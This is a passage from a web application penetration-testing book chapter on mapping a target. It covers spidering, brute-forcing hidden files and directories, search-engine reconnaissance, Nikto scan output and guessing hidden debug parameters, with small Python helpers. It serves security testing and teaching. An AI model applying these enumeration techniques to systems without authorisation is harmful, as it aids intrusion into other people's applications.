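    """Return absolute URLs for every path listed in Allow or Disallow lines."""
    seeds = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and whitespace
        field, _, value = line.partition(":")
        value = value.strip()
        if field.strip().lower() in ("allow", "disallow") and value:
            seeds.append(urljoin(base_url, value))
    return seeds


# Hypothetical robots.txt contents.
SAMPLE = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/   # old archives
Disallow:
"""

seeds = robots_seeds("http://wahh-app.com/", SAMPLE)
print(seeds)
```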

Figure 4-1: Mapping part of an application using Burp Spider

While often effective, this kind of fully automated approach to content

enumeration has some important limitations:

■ Unusual navigation mechanisms (such as menus dynamically created
and handled using complicated JavaScript code) are often not handled
properly by these tools, and so they may miss whole areas of an
application.

■ Multistage functionality often implements fine-grained input validation
checks, which do not accept the values that may be submitted by an
automated tool. For example, a user registration form may contain fields for
name, email address, telephone number, and ZIP code. An automated
application spider will typically submit a single test string in each
editable form field, and the application will return an error message
saying that one or more of the items submitted were invalid. Because the
spider is not intelligent enough to understand and act upon this message, it
will not proceed past the registration form and so will not discover any
further content or functions accessible beyond it.

■ Automated spiders typically use URLs as identifiers of unique content.
To avoid spidering indefinitely, they recognize when linked
content has already been requested and do not request it again. However,
many applications use forms-based navigation in which the same
URL may return very different content and functions. For example, a

banking application may implement every user action via a POST
request to /account.jsp, and use parameters to communicate the
action being performed. If a spider refuses to make multiple requests to
this URL, it will miss most of the application’s content. Some application
spiders attempt to handle this situation (for example, Burp Spider
can be configured to individuate form submissions based on parameter
names and values); however, there may still be situations where a fully
automated approach is not completely effective.

■ Conversely, some applications place volatile data
within URLs that is not actually used to identify resources or functions
(for example, parameters containing timers or random number seeds).
Each page of the application may contain what appears to be a new set
of URLs that the spider must request, causing it to continue running
indefinitely.

■ Where an application uses authentication, an effective application
spider must be able to handle this in order to access the functionality that
it protects. The spiders mentioned previously can achieve this if you
manually configure them either with a token for an authenticated session
or with credentials to submit to the login function. However, even
when this is done, it is common to find that the operation of the spider
breaks the authenticated session for various reasons:

  ■ By following all URLs, the spider will at some point request the
  logout function, causing its session to break.

  ■ If the spider submits invalid input to a sensitive function, the
  application may defensively terminate the session.

  ■ If the application uses per-page tokens, the spider will almost
  certainly fail to handle these properly by requesting pages out of their
  expected sequence, probably causing the entire session to be
  terminated.
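
Two of the limitations above concern how a spider decides whether it has already seen a piece of content. One possible approach, sketched here in Python, is to identify each request by its method, path, and parameters, while ignoring parameters known to be volatile. The parameter names in `VOLATILE` and the function name are hypothetical, and this is not a description of how any particular tool works.

```python
from urllib.parse import parse_qsl

# Assumption: names of parameters that change on every page but identify nothing.
VOLATILE = {"ts", "rand"}


def request_key(method, path, query="", body="", use_values=True):
    """Build a key that identifies a request for the purpose of spotting repeats."""
    params = parse_qsl(query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    kept = sorted(
        (name, value if use_values else "")
        for name, value in params
        if name not in VOLATILE
    )
    return (method.upper(), path, tuple(kept))


# The same URL with different actions yields different keys ...
transfer = request_key("POST", "/account.jsp", body="action=transfer")
statement = request_key("POST", "/account.jsp", body="action=statement")
print(transfer != statement)

# ... while a change in a volatile parameter alone does not.
first = request_key("GET", "/page", query="id=1&ts=111")
second = request_key("GET", "/page", query="id=1&ts=222")
print(first == second)
```

Deciding which parameters are volatile still requires human judgment about the application, which is one reason a fully automated approach falls short.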

WARNING In some applications, running even a simple web spider that

parses and requests links can be extremely dangerous. For example, an

application may contain administrative functionality that deletes users, shuts

down a database, restarts the server, and the like. If an application-aware

spider is used, great damage can be done if the spider discovers and uses

sensitive functionality. The authors have encountered an application that

included functionality to edit the actual content of the main application. This

functionality was discoverable via the site map and was not protected by any

access control. If an automated spider were run against this site, it would find

the edit function and begin sending arbitrary data, resulting in the main web

site being defaced in real time while the spider was running.

User-Directed Spidering

This is a more sophisticated and controlled technique, which is usually prefer-

able to automated spidering. Here, the user walks through the application in

the normal way using a standard browser, attempting to navigate through all

of the application’s functionality. As he does so, the resulting traffic is passed

through a tool combining an intercepting proxy and spider, which monitors all

requests and responses. The tool builds up a map of the application, incorpo-

rating all of the URLs visited by the browser, and also parses all of the applica-

tion’s responses in the same way as a normal application-aware spider and

updates the site map with the content and functionality it discovers. The spi-

ders within Burp Suite and WebScarab can be used in this way (see Chapter 19

for further information).

Compared with the basic spidering approach, this technique carries numer-

ous benefits:

■ Where the application uses unusual or complex mechanisms for
navigation, the user can follow these using a browser in the normal way.
Any functions and content accessed by the user will be processed by
the proxy/spider tool.

■ The user controls all data submitted to the application and can ensure
that data validation requirements are met.

■ The user can log in to the application in the usual way, and ensure that
the authenticated session remains active throughout the mapping
process. If any action performed results in session termination, the user
can log in again and continue browsing.

■ Any dangerous functionality, such as deleteUser.jsp, will be fully
enumerated and incorporated into the site map, because links to it will
be parsed out of the application’s responses. But the user can use his
discretion in deciding which functions to actually request or carry out.

TIP In addition to the proxy/spider tools just described, another range of

tools often useful during application mapping comprises the various browser

extensions that can perform HTTP and HTML analysis from within the browser

interface. For example, the IEWatch tool illustrated in Figure 4-2, which runs

within Microsoft Internet Explorer, monitors all details of requests and

responses, including headers, request parameters, and cookies, and analyzes

every application page to display links, scripts, forms, and thick-client

components. While all of this information can, of course, be viewed in

your intercepting proxy, having a second record of useful mapping data can

only help you better understand the application and enumerate all of its

functionality. See Chapter 19 for more information about tools of this kind.

Figure 4-2: IEWatch performing HTTP and HTML analysis from within the browser

HACK STEPS

■ Configure your browser to use either Burp or WebScarab as a local proxy

(see Chapter 19 for specific details about how to do this if you are unsure).

■ Browse the entire application normally, attempting to visit every single

link/URL you discover, submitting every single form, and proceeding

through all multistep functions to completion. Try browsing with

JavaScript enabled and disabled, and with cookies enabled and disabled.

Many applications can handle various browser configurations, and you

may reach different content and code paths within the application.

■ Review the site map generated by the proxy/spider tool, and identify any

application content or functions that you did not browse manually.

Establish how the spider enumerated each item — for example, in Burp

Spider, check the Linked From details. Using your browser, access the

item manually, so that the response from the server is parsed by the

proxy/spider tool to identify any further content. Continue this step

recursively until no further content or functionality is identified.

■ Optionally, tell the tool to actively spider the site using all of the already

enumerated content as a starting point. To do this, first identify any URLs

that are dangerous or likely to break the application session, and config-

ure the spider to exclude these from its scope. Run the spider and review

the results for any additional content that it discovers.

■ The site map generated by the proxy/spider tool contains a wealth of

information about the target application, which will be useful later in

identifying the various attack surfaces exposed by the application.

Discovering Hidden Content

It is very common for applications to contain content and functionality that

are not directly linked to or reachable from the main visible content. A common

example of this is functionality that has been implemented for testing or

debugging purposes and has never been removed.

Another example arises where the application presents different functional-

ity to different categories of users (for example, anonymous users, authenti-

cated regular users, and administrators). Users at one privilege level who

perform exhaustive spidering of the application may miss functionality that is

visible to users at other levels. An attacker who discovers the functionality

may be able to exploit it to elevate her privileges within the application.

There are countless other cases in which interesting content and functional-

ity may exist that the mapping techniques previously described would not

identify, including:

■■ Backup copies of live files. In the case of dynamic pages, their file extension may have changed to one that is not mapped as executable, enabling you to review the page source for vulnerabilities that can then be exploited on the main page.

■■ Backup archives that contain a full snapshot of files within (or indeed outside) the web root, possibly enabling you to easily identify all content and functionality within the application.

■■ New functionality that has been deployed to the server for testing but not yet linked from the main application.

■■ Old versions of files that have not been removed from the server. In the case of dynamic pages, these may contain vulnerabilities that have been fixed in the current version but can still be exploited in the old version.

■■ Configuration and include files containing sensitive data such as database credentials.

■■ Source files out of which the live application’s functionality has been compiled.

■■ Log files that may contain sensitive information such as valid usernames, session tokens, URLs visited, actions performed, and so on.

Effective discovery of hidden content requires a combination of automated

and manual techniques, and often relies upon a degree of luck.

Brute-Force Techniques

In Chapter 13, we will describe how automated techniques can be leveraged to

speed up just about any attack against an application. In the present context,

automation can be used to make huge numbers of requests to the web server,

attempting to guess the names or identifiers of hidden functionality.

For example, suppose that your user-directed spidering has identified the

following application content:

https://wahh-app.com/login.php

https://wahh-app.com/home/myaccount.php

https://wahh-app.com/home/logout.php

https://wahh-app.com/help/

https://wahh-app.com/register.php

https://wahh-app.com/menu.js

https://wahh-app.com/scripts/validate.js

The first step in an automated effort to identify hidden content might

involve the following requests, to locate additional directories:

https://wahh-app.com/access/

https://wahh-app.com/account/

https://wahh-app.com/accounts/

https://wahh-app.com/accounting/

https://wahh-app.com/admin/

https://wahh-app.com/agent/

https://wahh-app.com/agents/

...

Next, the following requests could be made, to locate additional pages:

https://wahh-app.com/access.php

https://wahh-app.com/account.php

https://wahh-app.com/accounts.php

https://wahh-app.com/accounting.php

https://wahh-app.com/admin.php

https://wahh-app.com/agent.php

https://wahh-app.com/agents.php

...

https://wahh-app.com/home/access.php

https://wahh-app.com/home/account.php

https://wahh-app.com/home/accounts.php

https://wahh-app.com/home/accounting.php

https://wahh-app.com/home/admin.php

https://wahh-app.com/home/agent.php

https://wahh-app.com/home/agents.php

...
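The two request lists above can be generated mechanically from a wordlist. The following is a minimal sketch, assuming a tiny illustrative wordlist and a hypothetical helper named candidate_urls; it only builds the URLs and sends nothing:

```python
from urllib.parse import urljoin


def candidate_urls(base, known_dirs, words, extension="php"):
    """Return directory probes at the web root, then page probes.

    Page probes are built for the web root and for every directory
    already discovered (for example "home/").
    """
    urls = [urljoin(base, f"{word}/") for word in words]
    for directory in [""] + list(known_dirs):
        for word in words:
            urls.append(urljoin(base, f"{directory}{word}.{extension}"))
    return urls


# Illustrative wordlist only; a real one would be far longer.
words = ["access", "account", "accounts", "accounting", "admin"]
for url in candidate_urls("https://wahh-app.com/", ["home/"], words):
    print(url)
```

Keeping URL generation separate from the code that sends requests makes it easy to rerun the same function each time a new directory is discovered.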

NOTE Do not assume that the application will respond with “200 OK” if a

requested resource exists, and “404 Not Found” if it does not. Many

applications handle requests for nonexistent resources in a customized way,

often returning a bespoke error message and a 200 response code. Further,

some requests for existent resources may receive a non-200 response. The

following is a rough guide to the likely meaning of the response codes that you

may encounter during a brute-forcing exercise looking for hidden content:

■■ 302 Found: If the redirect is to a login page, the resource may be accessible only by authenticated users. If it is to an error message, this may disclose a different reason. If it is to another location, the redirect may be part of the application’s intended logic, and this should be investigated further.

■■ 400 Bad Request: The application may use a custom naming scheme for directories and files within URLs, which a particular request has not complied with. More likely, however, is that the wordlist you are using contains some whitespace characters or other invalid syntax.

■■ 401 Unauthorized or 403 Forbidden: This usually indicates that the requested resource exists but may not be accessed by any user, regardless of authentication status or privilege level. It often occurs when directories are requested, and you may infer that the directory exists.

■■ 500 Internal Server Error: During content discovery, this usually indicates that the application expects certain parameters to be submitted when requesting the resource.

The various possible responses that may indicate the presence of interesting

content mean that it is difficult to write a fully automated script to output a

listing of valid resources. The best approach is to capture as much information as

possible about the application’s responses during the brute-force exercise, and

manually review it.
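As a rough illustration of capturing responses for manual review, the sketch below annotates each recorded response using the guide in the preceding note. The Result tuple and the triage function are hypothetical names. Matching the "not found" baseline on exact status and length is a simplifying assumption that fails if the error page echoes the requested name:

```python
from collections import namedtuple

# One recorded response; location is the Location header, if any.
Result = namedtuple("Result", "url status length location")


def triage(result, not_found):
    """Return a note for manual review, or None if the response looks
    identical to the one seen for a known-invalid resource."""
    if (result.status, result.length) == (not_found.status, not_found.length):
        return None
    if result.status == 302:
        return f"redirect to {result.location}"
    if result.status in (401, 403):
        return "exists but access is restricted"
    if result.status == 400:
        return "bad request: check the wordlist entry"
    if result.status == 500:
        return "error: may expect parameters"
    return "differs from not-found baseline"


# Baseline taken from a manual request for a resource known not to exist.
baseline = Result("/no-such-page-1234", 200, 1532, None)
for r in [Result("/admin/", 302, 0, "/login.php"),
          Result("/foo/", 200, 1532, None),
          Result("/bin/", 403, 210, None)]:
    print(r.url, triage(r, baseline))
```

The notes are prompts for a human reviewer, not verdicts; anything that is not filtered out by the baseline still needs to be checked by hand.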

Burp Intruder can be used to iterate through a list of common directory

names and capture details of the server’s responses, which can be reviewed to

identify valid directories. Figure 4-3 shows Burp Intruder being configured to

probe for common directories residing at the web root.

Figure 4-3: Burp Intruder being configured to probe for common directories

When the attack has been executed, clicking on column headers such as

“status” and “length” will sort the results accordingly, enabling anomalies to

be quickly picked out, as shown in Figure 4-4.

Figure 4-4: The results of a test probing for common directories

HACK STEPS

■ Make some manual requests for known valid and invalid resources, and

identify how the server handles the latter.

■ Use the site map generated through user-directed spidering as a basis for

automated discovery of hidden content.

■ Make automated requests for common filenames and directories within

each directory or path known to exist within the application. Use Burp

Intruder or a custom script, together with wordlists of common files and

directories, to quickly generate large numbers of requests. If you have

identified a particular way in which the application handles requests for

invalid resources (e.g., a customized “file not found” page), configure

Intruder or your script to highlight these results so they can be ignored.

■ Capture the responses received from the server, and manually review

these to identify valid resources.

■ Perform the exercise recursively as new content is discovered.

Inference from Published Content

Most applications employ some kind of naming scheme for their content and

functionality. By inferring from the resources already identified within the

application, it is possible to fine-tune your automated enumeration exercise to

increase the likelihood of discovering further hidden content.

HACK STEPS

■ Review the results of your user-directed browsing and basic brute-force

exercises. Compile lists of the names of all enumerated subdirectories,

file stems, and file extensions.

■ Review these lists to identify any naming schemes in use. For example,

if there are pages called AddDocument.jsp and ViewDocument.jsp,

then there may also be pages called EditDocument.jsp and

RemoveDocument.jsp. You can often get a feel for the naming habits of

developers just by reading a few examples. For example, depending on

their personal style, developers may be verbose (AddANewUser.asp),

succinct (AddUser.asp), use abbreviations (AddUsr.asp), or even be

more cryptic (AddU.asp). Getting a feel for the naming styles in use may

help you guess the precise names of content that you have not already

identified.

■ Sometimes, the naming scheme used for different content employs

identifiers such as numbers and dates, which can make inferring hidden

content extremely easy. This is most commonly encountered in the

names of static resources, rather than dynamic scripts. For example,

if a company’s web site links to AnnualReport2004.pdf and

AnnualReport2005.pdf, it ought to be a short step to identifying what the next

report will be called. Somewhat incredibly, there have been notorious

cases of companies placing files containing financial results onto their

web servers before these were publicly announced, only to have wily

journalists discover them based on the naming scheme used in earlier

years.

■ Review all client-side code such as HTML and JavaScript to identify any

clues about hidden server-side content. These may include HTML com-

ments relating to protected or unlinked functions, and HTML forms with

disabled SUBMIT elements, and the like. Often, comments are automati-

cally generated by the software that has been used to generate web con-

tent, or by the platform on which the application is running. References

to items such as server-side include files are of particular interest —

these files may actually be publicly downloadable and may contain

highly sensitive information such as database connection strings and

passwords. In other cases, developers’ comments may contain all kinds

of useful tidbits, such as database names, references to back-end com-

ponents, SQL query strings, and so on. Thick-client components such as

Java applets and ActiveX controls may also contain sensitive data that

you can extract. See Chapter 14 for further ways in which the application

may disclose information about itself.

■ Add to the lists of enumerated items any further potential names conjec-

tured on the basis of these. Also add to the file extension list common

extensions such as txt, bak, src, inc, and old, which may uncover the

source to backup versions of live pages, as well as extensions associated

with the development languages in use, such as java and cs, which may

uncover source files that have been compiled into live pages (see the tips

described later in this chapter for identifying technologies in use). The

Paros tool carries out this test when used to perform a vulnerability scan

(see Chapter 19).

■ Search for temporary files which may have been created inadvertently by

developer tools and file editors — for example, the .DS_Store file, which

contains a directory index under OS X, or file.php~1, which is a temporary

file created when file.php is edited.

■ Perform further automated exercises, combining the lists of directories,

file stems, and file extensions to request large numbers of potential

resources. For example, in a given directory, request each file stem com-

bined with each file extension. Or request each directory name as a sub-

directory of every known directory.

■ Where a consistent naming scheme has been identified, consider per-

forming a more focused brute-force exercise on the basis of this. For

example, if AddDocument.jsp and ViewDocument.jsp are known to

exist, you may create a list of actions (edit, delete, create, etc.) and make

requests of the form XxxDocument.jsp. Alternatively, create a list of

types of item (user, account, file, etc.) and make requests of the form

AddXxx.jsp.

■ Perform each exercise recursively, using new enumerated content and

patterns as the basis for further user-directed spidering, and further

automated content discovery. You are limited only by your imagination,

time available, and the importance you attach to discovering hidden con-

tent within the application you are targeting.
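The name-inference steps above lend themselves to a few small helpers. The following is a sketch under stated assumptions: the function names are hypothetical, page names are assumed to be CamelCase with a leading verb, and the final numeric run in a name is assumed to be the counter or year:

```python
import re
from itertools import product


def stem_extension_candidates(stems, extensions):
    """Combine every file stem with every file extension."""
    return [f"{stem}.{ext}" for stem, ext in product(stems, extensions)]


def action_candidates(known_page, actions):
    """Swap the leading verb of a name such as AddDocument.jsp."""
    match = re.match(r"([A-Z][a-z]+)(.+)", known_page)
    if not match:
        return []
    return [f"{action}{match.group(2)}" for action in actions]


def next_in_sequence(name, count=2):
    """Increment the last run of digits in a name, keeping its width."""
    match = re.search(r"(\d+)(?=\D*$)", name)
    if not match:
        return []
    digits = match.group(1)
    return [
        name[:match.start()]
        + str(int(digits) + step).zfill(len(digits))
        + name[match.end():]
        for step in range(1, count + 1)
    ]


print(stem_extension_candidates(["login", "myaccount"], ["bak", "old", "inc"]))
print(action_candidates("AddDocument.jsp", ["Edit", "Remove", "Delete"]))
print(next_in_sequence("AnnualReport2005.pdf"))
```

Each helper returns plain names, so the results can be appended to the existing lists of stems and extensions and fed back into the same automated requests.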

Use of Public Information

There may be content and functionality within the application that is not

presently linked from its main content, but has been linked in the past. In this

situation, it is likely that various historical repositories will still contain refer-

ences to the hidden content. There are two main types of publicly available

resources that are useful here:

■■ Search engines such as Google, Yahoo and MSN. These maintain a fine-grained index of all content which their powerful spiders have discovered, and also cached copies of much of this content, which persists even after the original content has been removed.

■■ Web archives such as the Wayback Machine located at web.archive.org. These archives maintain a historical record of a very large number of web sites, and in many cases allow users to browse a fully replicated snapshot of a given site as it existed at various dates going back several years.

In addition to content that has been linked in the past, these resources are

also likely to contain references to content that is linked from third-party sites,

but not from within the target application itself. For example, some applica-

tions contain restricted functionality for use by their business partners. Those

partners may disclose the existence of the functionality in ways that the appli-

cation itself does not.

HACK STEPS

■ Use several different search engines and web archives (listed previously)

to discover what content they indexed or stored for the application you

are attacking.

■ When querying a search engine, you can use various advanced tech-

niques to maximize the effectiveness of your research. The following sug-

gestions apply to Google — you can find the corresponding queries on

other engines by selecting their Advanced Search option:

  ■ site:www.wahh-target.com - This will return every resource within the target site which Google has a reference to.

  ■ site:www.wahh-target.com login - This will return all of the pages containing the expression login. In a very large and complex application, this technique can be used to quickly home in on interesting resources, such as site maps, password reset functions, administrative menus, and the like.

  ■ link:www.wahh-target.com - This will return all of the pages on other web sites and applications that contain a link to the target. This may include links to old content, or functionality that is intended for use only by third parties, such as partner links.

  ■ related:www.wahh-target.com - This returns pages that are “similar” to the target, and so will include a lot of irrelevant material. However, it may also include discussion about the target on other sites, which may be of interest.

  ■ For each search, perform it not only in the default Web section of Google, but also Groups and News, which may contain different results.

  ■ Browse to the last page of search results for a given query, and select Repeat the Search with the Omitted Results Included. By default, Google attempts to filter out redundant results by removing pages that it believes are sufficiently similar to others included in the results. Overriding this behavior may uncover subtly different pages that are of interest to you when attacking the application.

  ■ View the cached version of interesting pages, including any content that is no longer present in the actual application. In some cases, search engine caches contain resources that cannot be directly accessed in the application without authentication or payment.

  ■ Perform the same queries on other domain names belonging to the same organization, which may contain useful information about the application you are targeting.

■ If your research identifies old content and functionality that is no longer

linked to within the main application, it may still be present and usable.

The old functionality may contain vulnerabilities that do not exist else-

where within the application.

■ Even where old content has been removed from the live application,

details about the content obtained from a search engine cache or web

archive may contain references to or clues about other functionality that is

still present within the live application, and that can be used to attack it.
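When several domains and keywords are involved, it can help to generate the search strings described above rather than type them by hand. This is a minimal sketch; google_queries is a hypothetical helper, and the second domain in the usage loop is an invented example of another name belonging to the same organization:

```python
def google_queries(domain, keywords=("login",)):
    """Build the site:, link:, and related: searches for one domain."""
    queries = [f"site:{domain}"]
    queries += [f"site:{domain} {word}" for word in keywords]
    queries += [f"link:{domain}", f"related:{domain}"]
    return queries


# partners.wahh-target.com is a made-up second domain for illustration.
for domain in ["www.wahh-target.com", "partners.wahh-target.com"]:
    for query in google_queries(domain, ["login", "admin"]):
        print(query)
```

The output is intended to be pasted into the search engine manually, so that the results can be reviewed in context.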

A further public source of useful information about the target application is

any posts that developers and others have made to Internet forums. There are

numerous such forums in which software designers and programmers ask

and answer technical questions. Often, items posted to these forums will con-

tain information about an application that is of direct benefit to an attacker,

including the technologies in use, the functionality implemented, problems

encountered during development, known security bugs, configuration and

log files submitted to assist troubleshooting, and even extracts of source code.

HACK STEPS

■ Compile a list containing every name and email address you can discover

relating to the target application and its development. This should include

any known developers, names found within HTML source code, names found

in the contact information section of the main company web site, and any

names disclosed within the application itself, such as administrative staff.

■ Using the search techniques described previously, search for each identi-

fied name, to find any questions and answers they have posted to Inter-

net forums. Review any information found for clues about functionality

or vulnerabilities within the target application.

Leveraging the Web Server

Vulnerabilities may exist at the web server layer that enable you to discover

content and functionality that is not linked within the web application itself.

For example, there have been numerous bugs within web server software that

allow an attacker to list the contents of directories, or obtain the raw source for

dynamic server-executable pages. See Chapter 17 for some examples of these

vulnerabilities, and ways in which you can identify them. If such a bug exists,

you may be able to exploit it to directly obtain a listing of all pages and other

resources within the application.

Many web servers ship with default content that may assist you in attacking

them — for example, sample and diagnostic scripts that may contain known

vulnerabilities, or contain functionality that may be leveraged for some mali-

cious purpose. Further, many web applications incorporate common third-

party components that they use for various standard functions — for example,

scripts to implement a shopping cart or interface to email servers. Nikto is a

handy tool that issues requests for a wide range of default web server content,

third-party application components, and common directory names. While

Nikto will not rigorously test for any hidden bespoke functionality, it can often

be useful in discovering other resources that are not linked within the applica-

tion and that may be of interest in formulating an attack:

[manicsprout@king nikto-1.35]# perl nikto.pl

-----------------------------------------------------------------------

- Nikto 1.34/1.29 - www.cirt.net

+ Target IP: 127.0.0.1

+ Target Hostname: localhost

+ Target Port: 80

+ Start Time: Sat Feb 3 12:03:36 2007

-----------------------------------------------------------------------

- Scan is dependent on "Server" string which can be faked, use -g to override

+ Server ID string not sent

- Server did not understand HTTP 1.1, switching to HTTP 1.0

+ /bin/ - This might be interesting... (GET)

+ /client/ - This might be interesting... (GET)

+ /oracle - Redirects to /oracle/ , This might be interesting...

+ /temp/ - This might be interesting... (GET)

+ /cgi-bin/login.pl - This might be interesting... (GET)

+ 3198 items checked - 6 item(s) found on remote host(s)

+ End Time: Sat Feb 3 12:03:55 2007 (19 seconds)

-----------------------------------------------------------------------

+ 1 host(s) tested

HACK STEPS

There are several useful options available when running Nikto:

■ If you believe that the server is using a nonstandard location for interest-

ing content that Nikto checks for (for example /cgi/cgi-bin instead of

/cgi-bin) you can specify this alternate location using the option -root

/cgi/. For the specific case of CGI directories, these can also be specified

using the option -Cgidirs.

■ If the site uses a custom “file not found” page that does not return the

HTTP 404 status code, you can specify a particular string that identifies

this page by using the -404 option.

■ Be aware that Nikto does not perform any intelligent verification of

potential issues and so is prone to report false positives. Always check

any results returned by Nikto manually.
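Because every Nikto result needs manual checking, it is convenient to pull the reported paths out of the scan output and add them to your list of items to visit. The sketch below assumes the line format shown in the sample output earlier in this section ("+ /path - note"); other Nikto versions may format results differently, and nikto_findings is a hypothetical helper name:

```python
import re

# A finding line starts with "+ ", then a path, then " - " and a note.
FINDING = re.compile(r"^\+ (/\S*) - (.+)$")


def nikto_findings(report):
    """Return (path, note) pairs for each reported item."""
    findings = []
    for line in report.splitlines():
        match = FINDING.match(line.strip())
        if match:
            findings.append((match.group(1), match.group(2)))
    return findings


SAMPLE = """\
+ Target Hostname: localhost
+ /bin/ - This might be interesting... (GET)
+ /oracle - Redirects to /oracle/ , This might be interesting...
+ /cgi-bin/login.pl - This might be interesting... (GET)
+ 3198 items checked - 6 item(s) found on remote host(s)
"""

for path, note in nikto_findings(SAMPLE):
    print(path, "->", note)
```

Summary lines such as the target details and the item count are skipped because they do not begin with a path.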

Application Pages vs. Functional Paths

The enumeration techniques described so far have been implicitly driven by

one particular picture of how web application content may be conceptualized

and catalogued. This picture is inherited from the pre-application days of the

World Wide Web, in which web servers functioned as repositories of static

information, retrieved using URLs that were effectively filenames. To publish

some web content, an author simply generated a bunch of HTML files and

copied these into the relevant directory on a web server. When users followed

hyperlinks, they navigated around the set of files created by the author,

requesting each file via its name within the directory tree residing on the

server.

Although the evolution of web applications has fundamentally changed the

experience of interacting with the Web, the picture just described is still applic-

able to the majority of web application content and functionality. Individual

functions are typically accessed via a unique URL, which is usually the name

of the server-side script that implements the function. The parameters to the

request (residing in either the URL query string or the body of a POST request)

do not tell the application what function to perform — they tell it what infor-

mation to use when performing it. In this context, the methodology of con-

structing a URL-based map can be effective in cataloging the functionality of

the application.

In some applications, however, the picture based on application “pages” is

inappropriate. While it may be logically possible to shoehorn any application’s

structure into this form of representation, there are many cases in which a

different picture, based on functional paths, is far more useful for cataloging

its content and functionality. Consider an application that is accessed using

only requests of the following form:

POST /bank.jsp HTTP/1.1

Host: wahh-bank.com

Content-Length: 107

servlet=TransferFunds&method=confirmTransfer&fromAccount=10372918&toAccount=3910852&amount=291.23&Submit=Ok

Here, every request is made to a single URL. The parameters to the request

are used to tell the application what function to perform, by naming the Java

servlet and method to invoke. Further parameters provide the information to

use in performing the function. In the picture based on application pages, the

application will appear to have only a single function, and a URL-based map

will not elucidate its functionality. However, if we map the application in

terms of functional paths, we can obtain a much more informative and useful

catalogue of its functionality. Figure 4-5 is a partial map of the functional paths

that exist within the application.

Figure 4-5: A mapping of the functional paths within a web application

[Figure nodes: WahhBank.home; TransferFunds.selectAccounts, TransferFunds.enterAmount, TransferFunds.confirmTransfer; BillPayment.addPayee, BillPayment.selectPayee, BillPayment.enterAmount, BillPayment.confirmPayment; WahhBank.logout]

Representing an application’s functionality in this way is often more useful

even in cases where the usual picture based on application pages can be

applied without any problems. The logical relationships and dependencies

between different functions may not correspond to the directory structure

used within URLs. It is these logical relationships that are of most interest to

you, both in understanding the core functionality of the application, and in

formulating possible attacks against it. By identifying these, you can better

understand the expectations and assumptions of the application’s developers

when implementing the functions, and attempt to find ways of violating these

assumptions, causing unexpected behavior within the application.

In applications where functions are identified using a request parameter,

rather than the URL, this has implications for the enumeration of application

content. In the previous example, the content discovery exercises described so

far are unlikely to uncover any hidden content. Those techniques need to be

adapted to the mechanisms actually used by the application for accessing

functionality.

HACK STEPS

■ Identify any instances where application functionality is accessed not by

requesting a specific page for that function (e.g., /admin/editUser.jsp)

but by passing the name of a function in a parameter (e.g.,

/admin.jsp?action=editUser).

■ Modify the automated techniques described for discovering URL-

specified content to work on the content-access mechanisms in use

within the application. For example, if the application uses parameters

which specify servlet and method names, first determine its behavior

when an invalid servlet and/or method is requested, and when a valid

method is requested with invalid other parameters. Try to identify attrib-

utes of the server’s responses that indicate “hits” — i.e., valid servlets and

methods. If possible, find a way of attacking the problem in two stages,

first enumerating servlets and then methods within these. Using a similar

method to the one used for URL-specified content, compile lists of com-

mon items, add to these by inferring from the names actually observed,

and generate large numbers of requests based on these.

■ If applicable, compile a map of application content based on functional

paths, showing all of the enumerated functions and the logical paths and

dependencies between them.
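The two-stage approach in the steps above might be sketched as follows. The parameter names servlet and method come from the earlier example request. The names probe_body and enumerate_functions are hypothetical, as are the two callables, which stand in for code that would send a request and look for whatever "hit" attribute you identified manually:

```python
from urllib.parse import urlencode


def probe_body(servlet, method):
    """Form-encoded request body naming the function to invoke."""
    return urlencode({"servlet": servlet, "method": method})


def enumerate_functions(servlet_words, method_words, servlet_exists, method_exists):
    """Find valid servlets first, then try methods only within those.

    servlet_exists(name) and method_exists(servlet, name) are supplied
    by the tester and return True when the response indicates a hit.
    """
    found = {}
    for servlet in servlet_words:
        if servlet_exists(servlet):
            found[servlet] = [m for m in method_words if method_exists(servlet, m)]
    return found


# Stand-in oracle for demonstration only; no requests are sent here.
KNOWN = {"TransferFunds": {"selectAccounts", "confirmTransfer"}}
found = enumerate_functions(
    ["Admin", "TransferFunds"],
    ["confirmTransfer", "delete", "selectAccounts"],
    lambda servlet: servlet in KNOWN,
    lambda servlet, method: method in KNOWN[servlet],
)
print(found)
print(probe_body("TransferFunds", "confirmTransfer"))
```

Splitting the search this way means method names are tried only against servlets already shown to exist, which keeps the number of requests far below the full servlet-by-method product.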

Discovering Hidden Parameters

A variation on the situation where an application uses request parameters to

specify which function should be performed arises where other parameters

are used to control the application’s logic in significant ways. For example, an

application may behave differently if the parameter debug=true is added to

the query string of any URL — it might turn off certain input validation

checks, allow the user to bypass certain access controls, or display verbose

debug information in its response. In many cases, the fact that the application

handles this parameter cannot be directly inferred from any of its content (for

example, it does not include debug=false in the URLs that it publishes as

hyperlinks). The effect of the parameter can only be detected by guessing a

range of parameter names and values until the correct combination is submitted.

HACK STEPS

■ Using lists of common debug parameter names (debug, test, hide, source,

etc.) and common values (true, yes, on, 1, etc.), make a large number of

requests to a known application page or function, iterating through all

permutations of name and value. For POST requests, insert the added

parameter both into the URL query string and into the message body.

■ Burp Intruder can be used to perform this test using multiple payload

sets and the “cluster bomb” attack type (see Chapter 13 for more

details).

■ Monitor all responses received to identify any anomalies that may indi-

cate that the added parameter has had an effect on the application’s

processing.

■ Depending on the time available, target a number of different pages or

functions for hidden parameter discovery. Choose functions where it is

most likely that developers have implemented debug logic, such as login,

search, file uploading and downloading, and the like.
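For testers using a custom script rather than Burp Intruder, the permutation step above can be sketched as shown here. The name and value lists are the ones given in the first step. The functions add_param and hidden_param_probes are hypothetical helpers that only build URLs:

```python
from itertools import product
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

NAMES = ["debug", "test", "hide", "source"]
VALUES = ["true", "yes", "on", "1"]


def add_param(url, name, value):
    """Append name=value to the existing query string of url."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append((name, value))
    return urlunsplit(parts._replace(query=urlencode(query)))


def hidden_param_probes(url, names=NAMES, values=VALUES):
    """Every name/value permutation, as in a cluster bomb attack."""
    return [add_param(url, name, value) for name, value in product(names, values)]


probes = hidden_param_probes("https://wahh-app.com/login.php")
print(len(probes))  # 4 names x 4 values = 16 requests
print(probes[0])
```

For POST requests, the same name/value pair would also be appended to the message body, for example by passing the body through parse_qsl and urlencode in the same way.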

Analyzing the Application

Enumerating as much of the application’s content as possible is only one ele-

